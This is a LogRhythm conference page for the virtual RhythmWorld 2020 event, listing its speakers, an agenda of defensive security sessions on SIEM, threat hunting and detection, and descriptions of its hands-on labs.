RhythmWorld 2020

RhythmWorld Security Conference went virtual for the first time in 2020. Attendees were able to access the latest in security, LogRhythm best practices, and LogWars Capture the Flag (CTF) event for free — from anywhere across the globe.
About RhythmWorld Security Conference
RhythmWorld is the ultimate cybersecurity conference to access the tools and skills you need to grow as a security professional and enhance your security operations.
Thank you for helping us make RhythmWorld 2020 one for the books. With nearly 2000 attendees from across the globe, this was our largest security conference to date.
Explore RhythmWorld 2020 Sessions On-demand
Relive the digital experience or check out the content for the first time through our on-demand library of keynotes, content sessions, and partner videos. Watch our recommended sessions or explore all content at the link below. Enjoy!
By entering in RhythmWorld Security Conference you agree to the Event Registration Terms.
Why Attend?
Discover Security Trends and Best Practices
Stay on the forefront of security trends and topics with sessions lead by industry experts.
Gain New Skills and Participate in Interactive Sessions
Bring key insights back to your organization and have fun along the way.
Learn from LogRhythm Practitioners and Experts
Discover the latest LogRhythm capabilities and solutions designed to strengthen your security operations.
Share and Collect Insights from Peers
Hear how other industry experts are solving their business challenges with LogRhythm.
Connect with Your LogRhythm Community
Grow relationships with your LogRhythm peers and connect with like-minded security professionals.
RhythmWorld 2020 Speakers
RhythmWorld Security Conference brought cybersecurity leaders from across the industry to provide you with the latest perspectives and thought leadership to drive your security operations.
See the list of prestigious speakers that presented at RhythmWorld 2020 below!

Abid Adam
Axiata Group, Chief Risk & Compliance Officer

Brian Albrecht
Director, Sales Engineering, LogRhythm

Jinan Budge
Principal Analyst, Forrester

James Carder
CISO, LogRhythm

Rusty Carter
Chief Product Officer, LogRhythm

Andrew Costis
Senior Threat Researcher, VMware Carbon Black

Gene Cupstid
Information Security Developer, C.H. Robinson

Avani Desai
Partner & President, Schellman & Company

Stephen Dyson
Security Operations Analyst, Penn Medicine

Andrew Hollister
LogRhythm Labs & Security Advisor to the CSO

Karen Holmes
Vice President & CISO, TrueBlue Inc.

Curtis Huff
Security Analyst, WCF Insurance

Kip James
CISO, TTEC

Sam King
CEO, Veracode

Rob Lee
Fellow, SANS Institute

Robert M. Lee
CEO, Dragos

Mark Logan
CEO, LogRhythm

Sam Masiello
CISO, Gates Corporation

Christopher Mitchell
CISO, City of Houston

Jason Miller
Chief Executive Officer, BitLyft Cyber Security

Randall Otto
Director, Global Recruiting, LogRhythm

Adam Saunders
Information Security Manager, Bourne Leisure

Jeff Schmidt
CEO, Avertium

Seth Shestack
Deputy CISO, Temple University

Eric Shiflet
Director Product Management, LogRhythm

Dilip Singh
Vice President Cyber Operations, Sedara

Christopher K. Stangl
Federal Bureau of Investigation, Section Chief (Senior Executive Service) Cyber Division
Christopher K. Stangl
Section Chief, Cyber Division, FBI

Steve Surdu
Principal, Surdu Consulting

Rob Sweeney
Senior Information Security Engineer, Penn Medicine

Jake Williams
Founder, Rendition Infosec

Cindy Zhou
CMO, LogRhythm
RhythmWorld Sponsors
Connect with our sponsors to find the right technology and services for your organization.
Platinum Sponsors
Gold Sponsors
LogWars Sponsors
Agenda
View, browse, and sort the growing list of keynotes, sessions, and breakouts by track and level.
Check back often, as we will be adding more sessions and speakers. Please note that session dates and times are subject to change.
Find Your Timezone
Explore RhythmWorld Sessions
Opening Keynote feat. Seth Shestack of Temple University
Mark Logan, President & CEO LogRhythm | Seth Shestack, Deputy CISO, Temple University
8:00 AM – 9:30 AM MDT
The Modern and Evolving Security Leader: Security Executive Panel
James Carder, CSO, LogRhythm | Karen Holmes, CISO, True Blue Inc. | Kip James, VP, CISO, TTec | Chris Mitchell, CISO, City of Houston | Dilip Singh, VP of Cyber Operations, Sedara
- Advice to build and develop a security program
- Actionable tips to build a partnership with your board
- What the modern security executive looks like
- Key metrics and KPIs to show the value of your security operations program
- How your security program can enable business and become a point of differentiation
9:30 AM - 10:30 AM MDT
Women in Security Power Panel
Cindy Zhou, CMO, LogRhythm | Sam King, CEO, Veracode | Avani Desai, Founder & President, Schellman & Company
10:30 AM - 11:30 AM MDT
Custom Log Source Onboarding
Adam Shackleford, Professional Services Senior Consultant, LogRhythm | Brian Albrecht, Director, Sales Engineering, LogRhythm
11:30 AM - 12:30 PM MDT
SIEM
Purple Teaming
Brian Coulson, Principle Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
- The theory, goals and requirements of purple team engagements
- Planning a purple Team engagement around the MITRE ATT&CK framework
- How to use LogRhythm Case, Case Tags and Playbooks to structure your purple team engagement
- Using attack simulation tools such as Red Canary Atomic Red Team in your purple team engagement
11:30 AM - 12:30 PM MDT
SOC Excellence
SAM Service and Best Practices to Keep Your LogRhythm SIEM Healthy
Brian Stern, Administrative Co-Pilot Engineer, LogRhythm | Ashley Howard, Administrative Co-Pilot Engineer, LogRhythm
Attend this webinar to learn about the Support Account Manger (S.A.M.) service. This is a service that consists of SIEM platform experts whose focus is on SIEM administrative support, preventative care and support case monitoring. It is your dedicated point of contact to anything related to LogRhythm. Additionally, some quick preventative maintenance and administrative tips will be provided as a taste of what this service can do for you.
This session will be presented by Ashley Howard and Brian Stern from the Professional Services department who both have years of LogRhythm SIEM support experience which is currently being used to maintain LogRhythm environments across many different industries.
The presentation includes:
- Description of the SAM service offering
- Overview of the Diagnostic Tool used for quick health checks
- Quick tips to look for issues in the Platform Manager, Data Processor, Data Indexer and AI Engine components so they can be dealt with proactively
12:30 PM - 1:30 PM MDT
SIEM
Beating the Pen Testers: Rules and Investigations to Plant the Blue Team Flag
Curtis Huff, Security Analyst, WCF Insurance
In this session, Curtis Huff, a security analyst for WCF Insurance will present a tale of two pen tests- the first taking place before LogRhythm was set up, and the second a year later, with alert detection fully in place. See the difference that one year on a SIEM- with the right alerts in place- can make.
You’ll learn:
- How to move detection up the attach chain
- Three common attacks you might see on Day One of a pen test
- The ways to mitigate these attacks
- Other tripwires to set up in your enterprise to facilitate early detection
12:30 PM - 1:30 PM MDT
SOC Excellence
Finance & Insurance Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:30 PM - 2:30 PM MDT
Retail Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:30 PM - 2:30 PM MDT
Government Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:30 PM - 2:30 PM MDT
Hands-on Labs Help
1:30 PM - 2:30 PM MDT
The Top 5 SmartResponse Plugins You Need Today
Jake Haldeman, Manager of Sales Engineering Operations, LogRhythm | Sam Straka, Product Owner, LogRhythm
Key takeaways:
- Demos of 5(ish) popular SmartResponse Plugins
- Insight into how SmartResponse Plugins are built, installed, and configured
- Processes could be more efficient with SmartResponse automation
2:30 PM - 3:30 PM MDT
SOAR
Ransomware vs. Analytic Co-Pilot: Use Cases and Threat Hunting Panel
Jake Haldeman, Manager of Sales Engineering Operations, LogRhythm | Aaron Beardslee, Analytic Co-Pilot Consultant, LogRhythm | Tim Peck, Analytic Co-Pilot Consultant, LogRhythm
In this session will get to know two Analytic Co-Pilot Engineers and discuss war stories and how they stay on top of the latest threats. We’ll also get a chance to meet the WARMIND, a server used to test malware and ransomware to help ensure AI Engines rules are tuned properly.
In this session you’ll learn:
- The definition on an Analytic Co-Pilot
- Lessons learned from Analytic Co-Pilot Engineers
- How to safely test and detonate Ransomware for research
2:30 PM - 3:30 PM MDT
SOC Excellence
Introducing: LogRhythm.Tools
Eric Hart, Technical Account Manager, LogRhythm | Matt Willems, Product Manager, LogRhythm | Gene Cupstid, Information Security Developer, C.H. Robinson
Join in our session to learn the origins of LogRhythm.Tools, step through demonstrations that span from simple examples through to solving complex tasks, and learn how you can get started exploring this new resource. Presented by co-creators Eric Hart, Gene Cupstid, and Matt Willems.
You’ll learn:
- A new, easier, way to integrate with the LogRhythm APIs
- Demonstrated examples based on real world use cases
- Where to find additional information
- How you can get started using LogRhythm.Tools
3:30 PM - 4:30 PM MDT
SOAR
LogRhythm DX and You: Learn Troubleshooting Tips and Tricks for Your Linux DX
Heather Janelle, Principal Technical Support Engineer, LogRhythm
Join this Webinar to learn how to support your Linux DX and get quicker resolutions when you need to go to LogRhythm Support when there is an issue.
You’ll learn:
- Key log file locations and which logs to attach to a Support case
- Helpful curl commands
- Helpful Linux commands
- How to use Grafana to evaluate the health of your DX
3:30 PM - 4:30 PM MDT
SIEM
Opening Keynote feat. Abid Adam of Axiata Group
Mark Logan, President & CEO LogRhythm | Abid Adam, Group Chief Risk & Compliance Officer, Axiata Group Berhad
8:00 PM - 9:30 PM MDT
Cybersecurity Implications on Society – It’s Security’s Time to Shine feat. Forrester
Jinan Budge, Forrester
9:30 PM - 10:30 PM MDT
Asia Pacific Regional Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
10:30 PM - 11:30 PM MDT
Asia Pacific Hands-on Labs Help
11:30 PM - 12:30 AM MDT
Overcoming the Skills Shortage for Modern and Effective Security Operations Panel
Andrew Hollister, LogRhythm Labs & Security Advisor to the CSO | Andrew Costis, Senior Threat Researcher, VMware Carbon Black | Randall Otto, Director, Global Recruiting, LogRhythm | Adam Saunders,
Information Security Manager, Bourne Leisure
In a perfect world, your organization would staff a 24×7 SOC with highly talented cybersecurity professionals to secure its IT environment. But the truth is, a seemingly endless stream of new and complex cyber-attacks has driven the demand for qualified professionals through the roof and the number of unfilled positions has soared.
While there is no one-size-fits-all approach to solving the cybersecurity skill gap, our panel of experts will provide practical advice for finding and building a team with the right set of skill. Panelists will also discuss critical skill sets and outline resources to help you grow in your cybersecurity career. Moderated by Andrew Hollister, Senior Director of LogRhythm Labs.
You’ll learn:
- Global state of cybersecurity and recruiting
- Approaches to overcome the cybersecurity skill gap
- Tips to build experience and diversity in your security team
- Ways to grow your career
2:00 AM - 3:00 AM MDT
Gh0st Hunting with Netmon DPA Rules (And Other Cool Stuff)
Dan Crossley, Manager, Enterprise Sales Engineering, LogRhythm
Most customers use LogRhythm NetMon for network traffic visibility, but the NetMon Deep Packet Analytics (DPA) engine takes network analytics to a whole new level. DPA rules can detect malware communications such as C2 traffic & Domain Generation Algorithms (DGA’s), SMB & DNS vulnerabilities, ICMP tunneling and more! The intention of this technical deep dive is to provide practical solutions to common network threat detection problems.
In this talk, I will introduce NetMon Deep Packet Analytics rules by using them to solve five example use-cases:
- Detecting Gh0st Rat communications
- Detecting a vulnerability to EternalBlue
- Detecting a DNS exploit to Windows Domain Controllers known as ‘SIGRed’
- Detecting a possible malware DGA activity
- Detecting ICMP tunneling
This talk is accompanied by a hands-on lab ‘NetMon DPA Rules’; attendees are encouraged to take part to reinforce the lessons from this session. Lastly, it is encouraged for attendees of this talk to also listen to the ‘Malware Analysis 101’ session which expands on some of the core topics within this session.
3:00 AM - 4:00 AM MDT
NetMon
Threat Intelligence Platform and LogRhythm
Oliver Gheorghe, Enterprise Sales Engineer, LogRhythm | Sander Bakker, Enterprise Sales Manager, LogRhythm
The goal of Cyber Threat Intelligence is (CTI) to take a proactive approach to InfoSec. Threat Intelligence works to aggregate external indicators of compromise (IOCs) and integrate with a unified workflow to mature security operations.
Join this webinar to learn about the current CTI space, technologies, use-cases, best practices and how your existing tools can leverage cyber threat intelligence.Presenters include Sander Bakker, a veteran in the cyber security space, and Oliver Gheorghe, a former CTI consultant and Oasis member.
You’ll learn:
- The current state of CTI
- Benefits of CTI use in daily workflows
- Common practices and use-cases within the security space
- Examples of how to use CTI within the LogRhythm Platform to drive valuable investigations
3:00 AM - 4:00 AM MDT
SIEM
Effective Ways to Leverage NetworkXDR in Your Environment
Ramy Ahmad, Manager, Enterprise Sales Engineering, LogRhythm
There’s nothing like having visibility into the internal activity of endpoints for detecting threats; but you can’t always deploy an agent on every system or get logs from them. The beauty of network monitoring is the wide visibility it provides into the interactions between endpoints, servers and the Internet at large, all with a relatively few points of observation throughout your network, and without touching any endpoints.
In this real training session, join Ramy Ahmad, LogRhythm sales engineer, as he discusses different real-life use cases to increase visibility into your network.
These scenarios including:
- Tracking Operational Technology (OT) and Internet of Things (IoT): OT has historically received little attention from IT and IoT is still perceived to be emerging. However, both of these areas deserve vigilance and you might be very surprised when you start analyzing it on your network DNS – The bad guys depend on DNS for finding their infrastructure (e.g. command & control) and they exploit it as a communications. If you aren’t analyzing DNS queries on your network, you’re missing out.
- Database Traffic: At the end of the day, data is the number one thing you are trying to protect and said data lives on databases (DB). The reality is that few DB admins will permit a SIEM agent on their delicately tuned database servers. The network is a non-intrusive way of getting visibility to that plane of activity. Ramy will show you database traffic flows you didn’t even know were present. In fact, the whole Equifax breach could have been detected much sooner if they’d been monitoring DB traffic.
- Detecting Ransomware and Clear Text Passwords: Stay tuned on this one – it’s interesting!
Please join us for this hands-on and technical event where we get down and dirty with packets.
4:00 AM - 5:00 AM MDT
NetMon
Automating Adversarial Emulation with LogRhythm Echo
Daniel Crossley, Manager, Enterprise Sales Engineering, LogRhythm | Imran Hafeez, Analytic Co-Pilot Consultant, LogRhythm
4:00 AM - 5:00 AM MDT
SOC Excellence
Europe Regional Small Group Discussion
Join a conversation and share best practices with your peers in European Region. This discussion will be facilitated by Professional Services consultant, Simon McDowell and Senior Customer Success Manager, Amar Kaila.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
5:00 AM - 6:00 AM MDT
Middle East, Turkey & Africa Regional Small Group Discussion
Join a conversation and share best practices with your peers in the Middle East, Turkey, and Africa regions. This discussion will be facilitated by Professional Services consultant, Haitham Ali Bushara and Customer Success Manager, Majid Dohaji.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
5:00 AM - 6:00 AM MDT
European Hands-on Labs Help
6:00 AM - 7:00 AM MDT
The State of Cybersecurity Panel
James Carder, CSO, LogRhythm | Steve Surdu, Principal, Surdu Consulting | Rob Lee, Head of Faculty and Curriculum Executive Director at SANS | Jake Williams, SANS Sr. Instructor, Founder, Rendition InfoSec | Chris Stangl, Section Chief, FBI
2020 is proving to be another year of front-page ransomware attacks, state-sponsored hacking campaigns, and waves of data breaches. On top of direct attacks, security teams are facing natural disasters, a complicated geo-political environment, and changing workplace. Considering the continuously evolving threat landscape, what is the state of cybersecurity today?
In this panel, industry leaders will discuss the security industry as it stands today and their insights into the future. They’ll also cover the biggest threats, latest innovations, and their visions for the industry.
This panel is moderated by James Carder, LogRhythm Chief Security Officer. James is joined by several information security titans, including:
- Rob Lee, Head of Faculty and Curriculum Executive Director at SANS (Former member of the US Air Force Office of Special Investigations (AFOSI) and Director at Mandiant)
- Steve Surdu, Principal, Surdu Consulting (Former Vice President of Services and Incident Response at Mandiant)
- Jake Willems, Founder, Rendition Infosec (IANS Faculty Member and industry thought leader @MalwareJake)
- Chris Stangl, Station Chief, FBI
8:00 AM – 9:00 AM MDT
Cybersecurity Implications On Society – It’s Security’s Time To Shine
Jinan Budge, Principal Analyst Forrester
9:00 AM - 10:00 AM PM MDT
Managing Security and Operational Risk in Critical Infrastructure Panel
James Carder, CSO, LogRhythm | Jeff Schmidt, CEO, Avertium | Rob Sweeney, Senior Information Security Engineer, Penn Medicine | Stephen Dyson, Sr. Security Operations Analyst, Penn Medicine | Robert M. Lee, CEO, Dragos | Sam Masiello, CSO, Gates Corporation
Attacks on operational technology (OT) have been on the rise the for decades. The rise began with the Stuxnet worm that attacked Programmable Logic Controllers (PLCs) in SCADA systems and has increased sharply in the last few years. Not only do these attacks threaten national interests, but as OT continues to be vital in day to day operations, overall business continuity is also endangered. As such, detecting OT threats has become a top priority as governments and organizations around the world implement programs and deliver mandates to protect critical infrastructure and business operations, across all sectors and verticals. ‘
While limiting security and operational risk is a crucial issue, sometimes it’s easier said than done. Join this panel to hear security experts from across industries discuss business challenges, ways to evaluate risk, and strategies to reduce business risk with operational technology.
Moderated by James Carder, LogRhythm Chief Security Officer.
You’ll learn:
- Overview of operational risk and technologies associated with different critical industry
- How security plays a role in operations and achieving business continuity
- Ways your peers have effectively met business challenges
- Recommendations to manage security and operational Risk
10:00 AM - 11:00 AM MDT
LogRhythm Troubleshooting
Justin Henning, Solutions Engineer , LogRhythm | Joseph Mastromarino, Manager, Sales Engineering , LogRhythm
Maintaining the health of your LogRhythm deployment is critical to keep your security and operations program running smoothly. In this session, experts from LogRhythm will take an in-depth look at Diagnosing and resolving root causes for three different common issues, using proven methodology from the field.
You’ll learn:
- Troubleshooting best practices
- Where to find additional troubleshooting resources
- Tips to working with Support to help quickly resolve tickets
11:00 AM - 12:00 PM MDT
SIEM
Malware Analysis 101
Dan Crossley, Manager, Enterprise Sales Engineering, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
PA malware analyst is made up of two parts, one-part reverse-engineer and one-part detective. The of a goal of these White Hats are to understand how a piece of malware works in order to ultimately help detect and defend against it. This exciting area of cybersecurity is not limited to specialized engineers with formal education, as many resources are available for those willing to learn.
In this webinar, cybersecurity veterans Daniel Crossley and Sally Vincent will give an overview of malware analysis. Additionally, the pair will provide the tools and techniques to start your own malware analysis lab.
Key takeaways:
- How to build a malware analysis lab
- Static analysis techniques
- Dynamic analysis techniques
- Introduction to disassembly
11:00 AM - 12:00 PM MDT
Threat Hunting
Improving Threat Hunting With LogRhythm
Marcos Schejtman, Principle Sales Engineer, LogRhythm | Luis Castaneda, Enterprise Sales Representative, LogRhythm
Cybercriminals can compromise systems in just a matter of minutes. However, it could take weeks or even months to detect a possible threat. To reduce your mean time to detect (MTTD) and your mean time to respond (MTTR) to cyberthreats, you need to find a solution to automate your threat hunting capabilities.
This session will cover best practices to improve your threat hunting using LogRhythm.
You’ll learn:
- Threat Hunting Techniques
- Risk-Based Priority and Dashboard Cache
- Configuring LogRhythm Dashboards
- AI Engine Tuning
- Playbooks and SmartResponse Plugin Best Practices
11:00 AM - 12:00 PM MDT
Threat Hunting
Designing a Resilient Enterprise Logging Architecture
Andrew Pettet, Enterprise Sales Engineer | Jake Haldeman, Manager, Sales Engineering Operations, LogRhythm
Every organization is unique, with a different set of operational circumstances governing specific requirements and the scope of implementation. A network might be highly segmented due to security policies or geographic distribution, mandating specific collection capabilities. Or an organization might be constrained by budget and staffing limitations, requiring an incremental approach to rolling out a deployment. No matter the circumstances, architecture plays an important role in determining the long-term success of any SIEM implementation.
In this session learn the different architectural components of LogRhythm and outline the benefits of a proper configuration. Using real world examples taken from the field, presenters will outline the advantages of the LogRhythm Unified License Program (ULP) and how you can add resilience to your LogRhythm deployment.
You’ll learn:
- LogRhythm architecture basics
- Ways to thoughtfully expand your existing environment and how to structure entities
- The benefits of ULP
- Key metrics to measure your security maturity
12:00 PM - 1:00 PM MDT
SIEM
The Power of NetMon
Soren Frederiksen, Professional Services Consultant, LogRhythm
12:00 PM - 1:00 PM MDT
NetMon
LogRhythm and Jupyter Notebook
Brian Coulson, Principal Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm | Dan Kaiser, Threat Research Sr. Engineer, LogRhythm
Based on an article from John Lambert, “The Githubification of InfoSec”, John presents “If organizations were to contribute and share their unique expertise using these frameworks, and organizations were in this way to build on the expertise of others, defenders in every organization would benefit from the best defense in any organization.” We will explore how Jupyter Notebook can be used with LogRhythm in ways that will champion the concept of what John wrote.
Dan Kaiser, threat research senior engineer, Sally Vincent, threat research engineer, and Brian Coulson, principal threat research engineer, will demonstrate three distinct projects using the Jupyter Notebook, and integrations with LogRhythm. You will see how Jupyter Notebook uses the LogRhythm Rest API, work with Case, and Search, query MITRE ATT&CK, and perform threat hunting in a shareable manner.
You’ll learn:
- What is Jupyter Notebook, and how to install it
- Integration with LogRhythm Rest API
- Jupyter Notebook and LogRhythm Use Cases
- Shareable LogRhythm Jupyter Notebooks created by LogRhythm Labs
12:00 PM - 1:00 PM MDT
Threat Hunting
Media/Technology Small Group Discussion
Join a conversation and share best practices with your peers in the Media and Technology Industry. This discussion will be facilitated by Professional Services Consultant, Connor Lutz and Senior Customer Success Manager, Brandon Fox.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:00 PM - 2:00 PM MDT
Healthcare Small Group Discussion
Join a conversation and share best practices with your peers in the Healthcare industry. This discussion will be facilitated by Senior Professional Services Consultant, Derek Dalby and Senior Customer Success Manager, Amanda Wills.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:00 PM - 2:00 PM MDT
Education Small Group Discussion
Join a conversation and share best practices with your peers in the Education space. This discussion will be facilitated by Senior Professional Services Consultant, Scott McDonough and Customer Success Manager, Amy Johnson.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:00 PM - 2:00 PM MDT
LATAM Small Group Discussion
Join a conversation and share best practices with your peers in the Latin America region. This discussion will be facilitated by our Sales Engineers in the region, Marcos Schejtman, Carlos Alcocer, and Luis Rico and Customer Success Manager, Neri Perez.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
1:00 PM - 2:00 PM MDT
Hands-on Labs Help
1:00 PM - 2:00 PM MDT
Using LogRhythm to Defend Your Organization Against Ransomware
Sean Heffley, Senior Sales Engineer, LogRhythm | Aaron Beardslee, Analytic Co-Pilot Consultant, LogRhythm
As ransomware attacks continue to hit the headlines around the globe they pose a major threat to businesses of all sizes. How do you protect your organization against ransomware effectively to reduce risk?
This session will discuss how to use LogRhythm to defend your organization against ransomware.
You’ll learn:
- Updates on the most recent attacks
- Deep technical analysis on what happens on an endpoint that is infected by Ransomware
- How to defend your organization against Ransomware
- Using LogRhythm to quickly identify and remediate a ransomware attack.
2:00 PM - 3:00 PM MDT
SIEM
Threat Hunting with NetworkXDR
Eric Brown, Sr. Security Analyst, LogRhythm | Brian Coulson, Principle Threat Research Engineer, LogRhythm
2:00 PM - 3:00 PM MDT
NetMon
Threat Hunting With ATT&CK Technique “X”
Brian Coulson, Principle Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
Threat hunting with MITRE ATT&CK techniques can be approached in several ways. Join members of the LogRhythm Labs team as they take you on a journey of how to use MITRE ATT&CK techniques and LogRhythm to make your threat hunting activities more valuable and effective. They will start the journey using the known techniques of MITRE ATT&CK Group APT 29, also known as the Russian threat actor group The Dukes or Cozy Bear. The team will describe the known Indicators of Compromise (IOCs) like file hashes, IP addresses, etc., and how IOCs play into MITRE ATT&CK technique searches, and dashboards. Finally, the team will dig into more unknown, or suspicious activity based on the techniques by focusing on encoded PowerShell.
You’ll Learn:
- Threat hunting made easy using MITRE ATT&CK techniques
- How to create custom LogRhythm dashboards and searches.
- Moving from known, to unknown, and back to known to increase your detection capabilities
2:00 PM - 3:00 PM MDT
Threat Hunting
Unleash the Power of Analyze
Travis Holland, Sr. Professional Services Consultant, LogRhythm
The LogRhythm NextGen SIEM Platform is undeniably a powerful tool, unfortunately some customers aren’t using the product to it’s full potential. This session will discuss features and best practices that can help make you more efficient in your day-to-day activities. Specifically, the presenter will cover the basics for managing a healthy events database and tips for managing the LogRhythm Web Console. Additionally, he’ll discuss standard and new features found in the Web Console, such as Tail, that can improve your effectiveness as an analyst.
You’ll learn:
- How to leverage analyze dashboards to glean powerful insights from your data
- Best practices when working with the events database
- Web Console features and functionality
3:00 PM - 4:00 PM MDT
SIEM
Educational Partnerships Panel
Joe Murdock, Faculty, UC Denver | Jim Kowatch, CEO, InfoSec Learning | Barry Krauss, Director of Training, LogRhythm | Jordan Kent, LogRhythm
LogRhythm and the University of Colorado Denver partnered in 2019 to develop an online graduate course in IT Risk Management. Delivered in the Spring of 2020, this course provided students with the fundamentals of security analysis in the commercial enterprise and featured hands-on labs using the LogRhythm NextGen SIEM. This course culminated in the LogRhythm Security Analyst certification exam which not only provided students an understanding of how to detect and respond to a real-world cyber threat but offered instant career marketability with an industry recognized certification.
Since then, LogRhythm has partnered with numerous other higher education institutions to provide real-world, hands on training to the security analysts of tomorrow. This panel features a conversation between LogRhythm, CU Denver, and InfoSec Learning on their goals, challenges, outcomes, lessons learned, and future plans. If you’re a customer from an institute of higher learning, or a partner with EDU customers, this is a session you don’t want to miss.
3:00 PM - 4:00 PM MDT
General
Lessons Learned in the First Year of Creating AI Engine Detection Rules
Brian Coulson, Principle Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
On April 9th, 2019, LogRhythm Labs released the MITRE ATT&CK Module, with a focus on high efficacy technique detections. Since our initial release, we’ve learned a lot regarding what techniques are the most valuable to detect, how to optimally threat hunt using the techniques, and where we should focus next in our MITRE ATT&CK technique detections.
Dan Kaiser, threat research senior engineer, Sally Vincent, threat research engineer, and Brian Coulson, principal threat research engineer, will focus heavily on MITRE ATT&CK Technique: PowerShell, ID: T1059.001. Microsoft PowerShell is a modular shell native in Windows, and with PowerShell 7, also works on Linux and Mac. PowerShell enables users, and administrators to do tasks in a very efficient way. It also is heavily abused by adversaries performing malicious actions. How does LogRhythm Labs design a detection for a technique that can be used for good, and bad? We will present our challenges from additional logging requirements, detecting PowerShell usage, testing PowerShell detections, and how you can take detections that event heavily and create actionable alarms.
Key takeaways
- MITRE ATT&CK Technique development process
- Tips and Tricks on tuning techniques to become actionable alarms in your environment
- Focus on many ways PowerShell can be detected
3:00 PM - 4:00 PM MDT
Threat Hunting
Asia Pacific Regional Small Group Discussion
Join a conversation and share best practices with your peers in Asia Pacific Region. This discussion will be facilitated by Professional Services consultant, Brian Holt and Customer Success Manager, Michael Hubbard.
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
9:00 PM - 10:00 PM MDT
Asia Pacific Hands-on Labs Help
10:00 PM - 11:00 PM MDT
Europe Regional Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first serve basis.
3:00 AM - 4:00 AM MDT
European Hands-on Labs Help
4:00 AM - 5:00 AM MDT
LogWars Capture the Flag (CTF) Challenge
8:00 AM – 9:30 AM MDT
Hands-on Labs Help
10:00 AM - 11:00 AM MDT
Tail in Web and Search Improvements
Basic Threat Hunting – Using FIM to Detect Unauthorized Access
Your company is concerned about unauthorized access to financial files. To help combat the potential threat, your SOC team created a LogRhythm File Integrity Monitoring (FIM) policy to monitor for unauthorized access. With the FIM policy in place you now must continue to monitor activity and investigate users attempting to access unauthorized areas.
In this lab, you will:
- Investigate activity related to a FIM policy
- Determine who maliciously accessed documents monitored
- Create a Case to document your findings
- Uncover all actions the nefarious user took and preserve evidence in the case
Life of a Case – SOC 101
An AI Engine alarm has been triggered for multiple password changes by an admin. These events these could potentially be used as future backdoors or to prevent the affected users from logging in to systems.
In this lab you will:
- Review the alarm and details
- Open a case
- Add associated evidence to case
- Assign a collaborator
- Close case
- Review case metrics
Building Dashboards and Drilldown Layouts
Set up a new dashboard based around data classifications, separate data by Audit, Security & Operations through widgets. Use 3 x 3 approach with the widgets and also build a targeted drill down widget.
In this lab you will:
- Build a dashboard
- Set up and customize widgets
- Set up a targeted drilldown through a custom widget
Building AI Engine Rules
Getting Started with and Building Kibana Dashboards
Kibana allows you to visualize data in any form you wish, to build custom visualizations, custom dashboards and to run your own searches and investigations against data held in LogRhythm’s DX.
In this lab, you will:
- Perform Basic Search in Kibana
- Search using Lucene Syntax
- Build Visualizations
- Build a Dashboard
Add Kibana to Your LogRhythm XM
Follow the installation process for adding Kibana to your LogRhythm instance. At the end of the lab, you will be able to setup Kibana and create your first “it’s working” dashboard.
In this lab you will:
- Download the correct Kibana version
- Install and configure Kibana
- View LogRhythm data in Kibana
Open Collector Labs: 101, 202, 303
Open Collector 101 – Deploy an Open Collector
In this section, you’ll deploy the LogRhythm Open Collector and connect it to your SIEM environment.
Open Collector 202 – Import Community Device Support
In this section, you’ll use your setup from Lab 1 to import device support created by the LogRhythm Community into your Open Collector.
Open Collector 303 – Create Device Support
In this section, you’ll use your setup from Open Collector 101 and 202 to configure FileBeat, then write your own JSON Parsing with “JQ” to get normalized logs into the SIEM.
Building and Using Contextualization Actions
A security analyst uses many tools to triage alarms and perform research. Contextualize Actions speed up the process of performing looking up metadata from LogRhythm in third party tools. Learn how to create, deploy and configure new web contextualization actions.
In this lab you will:
- Create a Contextualize Action to look up IP Addresses in ARIN (American Registry for Internet Numbers)
- Create a Contextualize Action to look up Windows Event IDs in Ultimate Windows Security
- Understand the settings available in Contextualize Actions
Building SmartResponse Plugins
As an SOC team member, you are concerned with responding to threats promptly so that damage can be prevented or minimized. You want to create a SmartResponse that will log off users from a host. Learn how to create a simple SmartResponse plugin (SRP) from scratch. You will practice writing the wrapper, creating the payload, and deploying the plugin.
In this lab you will:
- Review the PowerShell script
- Create the Smart Response (SRP) XML wrapper
- Import your SmartResponse
- Test your SmartResponse
LogRhythm API 101
This lab will guide you through connecting to the LogRhythm API, performing some test requests, and creating a script to interface with the API.
This is achieved through the following steps:
- Install Postman
- Postman Setup
- Setup LogRhythm for API Access
- Test Requests in Postman
- Generate a Python code sample using Postman
- Create a custom Python script using the code sample
Getting Started with ECHO
Ever set up a new AI Engine alarm and wondered if it will fire? In this lab, learn how to use the LogRhythm Echo tool to generate logs that can be used to validate a functional SIEM as well as test alarms.
In this lab you will:
- Log into Echo
- Browse for use cases
- Fire the use case
- Check out the alarm in the Web Console
Basic Log Source Lifecycle
Log source management is a key administrative task in any LogRhythm environment. As an administrator, you will spend a lot of time managing your log sources. In this lab, you will practice the key tasks necessary to get data flowing into LogRhythm!
Specifically you will:
- Configure a new log source
- Accept the log source and verify that data is being received
- Upgrade the agent used to collect the log source
- Retire the log source
Log Source Troubleshooting and Tuning
In this lab you will:
- Set up Silent Log Source Detection
- Troubleshoot a Log that’s not collecting
- Create a GLPR from Investigation Results
- Adjust Classification Based Data Management Settings
Advanced Log Source Data Management
An essential part of tuning the SIEM involves overriding the default behavior of the Message Processing Engine. LogRhythm provides several tools to Administrators to achieve desired results. The most common are Global Log Processing Rules (GLPR’s) and the Classification Based Data Management System.
